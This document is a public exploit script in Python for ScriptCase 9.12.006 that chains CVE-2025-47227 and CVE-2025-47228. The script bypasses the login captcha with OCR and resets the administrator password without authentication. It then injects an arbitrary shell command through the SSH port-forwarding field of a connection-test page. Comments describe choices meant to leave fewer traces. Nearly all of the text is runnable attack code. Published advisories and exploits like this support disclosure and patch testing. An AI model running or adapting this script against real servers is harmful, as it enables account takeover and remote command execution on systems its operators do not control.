# Exploit Title: ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)
# Date: 04/07/2025
# Exploit Author: Alexandre ZANNI (noraj) & Alexandre DROULLÉ (cabir)
# Vendor Homepage: https://www.scriptcase.net/
# Software Link: https://www.scriptcase.net/download/
# Version: 1.0.003-build-2 (Production Environment) / 9.12.006 (23) (ScriptCase)
# Tested on: EndeavourOS
# CVE : CVE-2025-47227, CVE-2025-47228
# Source: https://github.com/synacktiv/CVE-2025-47227_CVE-2025-47228
# Advisory: https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution
# Imports
## stdlib
import io
import random
import optparse
import re
import string
import sys
import urllib.parse
## third party
from PIL import Image, ImageEnhance, ImageFilter # pip3 install Pillow
import pytesseract # pip3 install pytesseract
import requests # pip install requests
from bs4 import BeautifulSoup # pip install beautifulsoup4
# Clean image + OCR
def process_image(input_image, output_image_path=None):
# Open the image
img = Image.open(io.BytesIO(input_image))
# Convert the image to RGB (in case it's in a different mode)
img = img.convert('RGB')
# Load the pixel data
pixels = img.load()
# Get the dimensions of the image
width, height = img.size
# Process each pixel
for y in range(height):
for x in range(width):
r, g, b = pixels[x, y]
# Change the crap background to a fixed color (letters are only black or white, and background is random color but not black or white)
if (r, g, b) != (0, 0, 0) and (r, g, b) != (255, 255, 255):
pixels[x, y] = (211, 211, 211) # Change the pixel to light grey
elif (r, g, b) == (255, 255, 255): # Change white text in black text
pixels[x, y] = (0, 0, 0) # Change the pixel to black
# Size (200, 50) * 5
img = img.resize((1000,250), Image.Resampling.HAMMING)
# Use Tesseract to convert the image to text
# psm 6 or 8 work best
# limit alphabet
# disable word optimized detection https://github.com/tesseract-ocr/tessdoc/blob/main/ImproveQuality.md#dictionaries-word-lists-and-patterns
custom_oem_psm_config = rf'--psm 8 --oem 3 -c tessedit_char_whitelist={string.ascii_letters} -c load_system_dawg=false -c load_freq_dawg=false --dpi 300' # there are only uppercase but keep lowercase to avoid false negative
text = pytesseract.image_to_string(img, config=custom_oem_psm_config)
return(text.upper().strip()) # convert false positive lowercase to uppercase, strip because leading whitespace is often added
# Step 1: Set is_page to true on the session
def prepare_session(url_base, cookies):
res = requests.get(
f'{url_base}/prod/lib/php/devel/iface/login.php',
cookies=cookies,
verify=False
)
if res.status_code == 200:
print("[+] Session prepared")
else:
print(f"[-] Failed with status code {res.status_code}")
# Random hex string of arbitrary size
def rand_hex(size):
return ''.join(random.choice('0123456789abcdef') for _ in range(size))
# Step 2: Get a captcha challenge for the session
def captcha_session(url_base, cookies):
res = requests.get(
f'{url_base}/prod/lib/php/devel/lib/php/secureimage.php',
cookies=cookies,
verify=False
)
if res.status_code == 200:
print("[+] Captcha retrieved")
return res.content
else:
print(f"[-] Failed with status code {res.status_code}")
# Step 3: Change the password with the prepared session
def reset_password(url_base, cookies, captcha_img, captcha_txt):
new_password = random.choice(string.ascii_letters).capitalize() + rand_hex(10) + str(random.randint(0,9))
email = f'{rand_hex(10)}@{rand_hex(8)}.com'
data = {
'ajax': 'nm',
'nm_action': 'change_pass',
'email': email,
'pass_new': new_password,
'pass_conf': new_password,
'lang': 'en-us',
'captcha': captcha_txt
}
res = requests.post(
f'{url_base}/prod/lib/php/devel/iface/login.php',
data=data,
cookies=cookies,
verify=False
)
if res.status_code == 200 and res.text == '{"result":"success"}':
print("[+] Password reset successfully")
print(f"[+] The new password is: {new_password}")
print(f"[+] The delcared (fake) email address was: {email}")
elif res.status_code == 200 and res.text == '{"result":"error","message":"Invalid captcha"}':
print("[-] OCR failed")
print(f"[-] Failed captcha submission was {captcha_txt}")
img = Image.open(io.BytesIO(captcha_img))
img.show()
manual_input = input("[+] Input displayed captcha to retry manually: ")
reset_password(url_base, cookies, captcha_img, manual_input)
elif res.status_code == 200 and res.text == '{"result":"error","message":"The password is incorrect."}':
print("[-] Non default password policy")
print("[-] Hardcode a password that matches it")
print(f"[-] Failed password is: {new_password}")
else:
print(f"[-] Failed with status code {res.status_code}")
print(res.text)
print('[-] Data was:')
print(data)
# Detect the deployment path of ScriptCase and produciton environment from the homepage.
# E.g. deployment path is /scriptcase/
# sc_pathToTB variable on http://10.58.8.213/ will be '/scriptcase/prod/third/jquery_plugin/thickbox/'
# ScriptCase login page => http://10.58.8.213/scriptcase/devel/iface/login.php
# Production Environment login page => http://10.58.8.213/scriptcase/prod/lib/php/devel/iface/login.php
def detect_deployment_path(homepage_url):
res = requests.get(homepage_url, verify=False) # HTTP redirections are handled automatically (not JS redirects)
if res.status_code == 200:
print("[+] Looking for deployment path in JS and computing login paths")
reg = r"var sc_pathToTB = '(.+)/prod/third/jquery_plugin/thickbox/';"
match = re.search(reg, res.text)
# compute URL without path
parsed_url = urllib.parse.urlparse(homepage_url)
homepage_root = f"{parsed_url.scheme}://{parsed_url.netloc}"
if match:
base_path = match.group(1)
print(f"[+] Deployment path found: {base_path}/")
print(f"[+] ScriptCase login page: {homepage_root}{base_path}/devel/iface/login.php (probably not deployed on a production environment)")
print(f"[+] Production Environment login page: {homepage_root}{base_path}/prod/lib/php/devel/iface/login.php")
else: # either a website not made with ScriptCase or root redirects to the devel page
js_redirect(res)
# try to detect the devel/iface/login.php page
reg2 = r'http://www\.scriptcase\.net|doChangeLanguage|str_lang_user_first'
match = re.search(reg2, res.text)
if match: # devel page
print(f"[?] This may be the development console?")
# now try to extract path from favicon
reg3 = r'<link rel="shortcut icon" href="(.+)/devel/conf/scriptcase/img/ico/favicon\.ico"'
match = re.search(reg3, res.text)
if match: # base path found
base_path = match.group(1)
print(f"[+] Deployment path found: {base_path}/")
print(f"[+] ScriptCase login page: {homepage_root}{base_path}/devel/iface/login.php")
print(f"[+] Production Environment login page: {homepage_root}{base_path}/prod/lib/php/devel/iface/login.php")
else: # false positive, it's not devel page
print(f"[-] Failed to find deployment path, is this site made with ScriptCase?")
else: # no ScriptCase detected
print("[-] Failed to find deployment path, is this site made with ScriptCase?")
else:
print(f"[-] Failed with status code {res.status_code}")
# Try to handle JS redirect else warn and exit
def js_redirect(res):
if re.search(r'window\.location', res.text):
print('[-] JavaScript redirection detected')
print('[-] JavaScript redirection not handled (no headless browser with JS engine)')
print(f"[-] Returned page is:\n{res.text}")
print(f"[-] Last redirection URL is:\n{res.url}")
match = re.search(r"window\.location\s*=\s*['\"](.+)['\"]", res.text)
if match:
redirect_url = f"{res.url}/{match.group(1)}"
print(f"[?] Let's try again with: {redirect_url}")
detect_deployment_path(redirect_url)
else:
print('Please try again with redirect URL')
exit(1)
# Remote command execution on the system
#
# Instead of registering a new connection (admin_sys_allconections_create_wizard.php), we can just test it
# (admin_sys_allconections_test.php) so we leave less traces.
# Even if the test results in "Connection Error" / "Unable to connect", the command was stil lexecuted.
def command_injection(url_base, cookies, cmd):
data = {
'hid_create_connect': 'S',
'dbms': 'mysql',
'conn': 'conn_mysql',
'dbms': 'pdo_mysql',
'host': '127.0.0.1:3306',
'server': '127.0.0.1',
'port': '3306',
'user': rand_hex(11),
'pass': rand_hex(8),
'show_table': 'Y',
'show_view': 'Y',
'show_system': 'Y',
'show_procedure': 'Y',
'decimal': '.',
'use_persistent': 'N',
'use_schema': 'N',
'retrieve_schema': 'Y',
'retrieve_schema': 'Y',
'use_ssh': 'Y',
'ssh_server': '127.0.0.1',
'ssh_user': 'root',
'ssh_port': '22',
'ssh_localportforwarding': f'; {cmd};#',
'ssh_localserver': '127.0.0.1',
'ssh_localport': '3306',
'form_create': form_create(url_base, cookies),
'retornar': 'Back',
'concluir': 'Save',
'confirmar': 'Back',
'voltar': 'Confirm',
'step': 'sgdb2',
'nextstep': 'dados_rep'
}
res = requests.post(
f'{url_base}/prod/lib/php/devel/iface/admin_sys_allconections_test.php',
data=data,
cookies=cookies,
verify=False
)
if res.status_code == 200:
print("[+] Command executed (blind)")
else:
print(f"[-] Failed with status code {res.status_code}")
exit(1)
# Get form_create ID for command_injection()
def form_create(url_base, cookies):
res = requests.get(
f'{url_base}/prod/lib/php/devel/iface/admin_sys_allconections_create_wizard.php',
cookies=cookies,
verify=False
)
if res.status_code == 200:
print("[+] Parsing results to find form_create ID")
soup = BeautifulSoup(res.text, 'html.parser')
form_create = soup.css.select_one('html body.nmPage form input[name="form_create"]')
if form_create:
form_create_id = form_create.get('value')
print(f"[+] form_create ID found: {form_create_id}")
return form_create_id
else:
print("[-] No form_create ID found")
exit(1)
return res.content
else:
print(f"[-] Failed with status code {res.status_code}")
exit(1)
# Handles login
#
# Comes with a cookie as there is session fixation (cookie not renewed after login)
def login(url_base, cookies, password):
data = {
'option': 'login',
'opt_par': None,
'hid_login': 'S',
'field_pass': password,
'field_language': 'en-us'
}
res = requests.post(
f'{url_base}/prod/lib/php/nm_ini_manager2.php',
data=data,
cookies=cookies,
verify=False
)
if res.status_code == 200:
print("[+] Authentication successful")
else:
print("[-] Authentication failed")
# Exploit
if __name__ == '__main__':
help_text = """
Examples:
Pre-Auth RCE (password reset + RCE)
python exploit.py -u http://example.org/scriptcase -c "command"
Password reset only (no auth)
python exploit.py -u http://example.org/scriptcase
RCE only (need account)
python exploit.py -u http://example.org/scriptcase -c "command" -p 'Password123*'
Detect deployment path
python exploit.py -u http://example.org/ -d
"""
parser = optparse.OptionParser(usage=help_text)
parser.add_option('-u', '--base-url')
parser.add_option('-c', '--command')
parser.add_option('-p', '--password')
parser.add_option('-d', '--detect', action='store_true', dest='detect')
opts, args = parser.parse_args()
cookies = {
'PHPSESSID': rand_hex(26) # Simulate a random PHPSESSID (more stealth than an arbitrary string)
}
URL_BASE = opts.base_url
if opts.base_url and opts.command and not opts.password and not opts.detect: # Pre-Auth RCE (password reset + RCE)
prepare_session(URL_BASE, cookies)
captcha_img = captcha_session(URL_BASE, cookies)
captcha_txt = process_image(captcha_img)
reset_password(URL_BASE, cookies, captcha_img, captcha_txt)
command_injection(URL_BASE, cookies, opts.command)
elif opts.base_url and not opts.command and not opts.password and not opts.detect: # Password reset only (no auth)
prepare_session(URL_BASE, cookies)
captcha_img = captcha_session(URL_BASE, cookies)
captcha_txt = process_image(captcha_img)
reset_password(URL_BASE, cookies, captcha_img, captcha_txt)
elif opts.base_url and opts.command and opts.password and not opts.detect: # RCE only (need account)
prepare_session(URL_BASE, cookies)
login(URL_BASE, cookies, opts.password)
command_injection(URL_BASE, cookies, opts.command)
elif opts.base_url and not opts.command and not opts.password and opts.detect: # Detect deployment path
detect_deployment_path(URL_BASE)
else:
parser.print_help()
sys.exit(1)